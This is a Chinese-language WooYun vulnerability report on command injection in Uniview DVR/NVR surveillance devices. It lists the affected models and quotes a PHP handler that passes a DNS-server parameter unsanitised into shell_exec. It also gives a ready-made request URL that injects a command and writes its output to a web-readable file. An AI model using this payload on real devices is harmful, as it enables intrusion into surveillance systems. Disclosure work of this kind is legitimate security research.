浙江宇视科技安防(DVR/NVR)等监控设备命令执行

漏洞概要 关注数(15) 关注此漏洞

缺陷编号： WooYun-2016-182299

漏洞标题： 浙江宇视科技安防(DVR/NVR)等监控设备命令执行

相关厂商： 浙江宇视科技有限公司

漏洞作者： Angle_G

提交时间： 2016-03-08 17:18

公开时间： 2016-06-09 09:20

漏洞类型： 命令执行

危害等级： 高

自评Rank： 20

漏洞状态： 厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 无

2人收藏

漏洞详情

披露状态：

2016-03-08： 细节已通知厂商并且等待厂商处理中
2016-03-11： 厂商已经确认，细节仅向厂商公开
2016-03-14： 细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航、无声信息）
2016-05-05： 细节向核心白帽子及相关领域专家公开
2016-05-15： 细节向普通白帽子公开
2016-05-25： 细节向实习白帽子公开
2016-06-09： 细节向公众公开

简要描述：

浙江宇视科技: http://www.uniview.com/

影响设备型号：ECR3316_HF ECR3316-HF ECR3308_HF ECR3308-HF ISC3500E ISC3500E ISC3500S ISC3500S ECR3316_HF_E ECR3316-HF-E ECR3308_HF_E ECR3308-HF-E ECR3316_HF_S ECR3316-HF-S ECR3308_HF_S ECR3308-HF-S ISC3500_ET ISC3500-ET ISC3500_EL ISC3500-EL ISC3500_ST ISC3500-ST ISC3500_SL ISC3500-SL ECR2104_HF ECR2104-HF ECR2108_HF ECR2108-HF ISC2500_SP ISC2500-SP ISC2500_EP ISC2500-EP ISC2500_E ISC2500-E ISC2500_S ISC2500-S ISC2500_L ISC2500-L ECR3308_HF_SC ECR3308-HF-SC ECR3316_HF_SC ECR3316-HF-SC ISC3500_LC ISC3500-LC ISC3500_SC ISC3500-SC ISC3500_EC ISC3500-EC ISC5000-E

现国内摄像头主流就是，老大海康 老二大华 老三宇视....................

分享一篇老外挖 某摄像头的案例：https://www.pentestpartners.com/blog/pwning-cctv-cameras/

详细说明：

..............代码省略....................
     // 设置DNS解析服务器地址
     case 'setDNSServer' :
         shell_exec('echo "nameserver '.$_REQUEST['DNSServerAdrr'].'"'.' > /etc/resolv.conf');
         $result['Code'] = 0;
         getTip($result);
         echo json_encode($result);
         break;
  default :
   showErrorRequest();
   break;
 ...........................代码省略.....................

/Interface/DevManage/VM.php?cmd=setDNSServer&DNSServerAdrr=" | whoami >/usr/local/program/ecrwww/apache/htdocs/Interface/DevManage/11.php %23"

漏洞证明：

修复方案：

版权声明：转载请注明来源 Angle_G@乌云

漏洞回应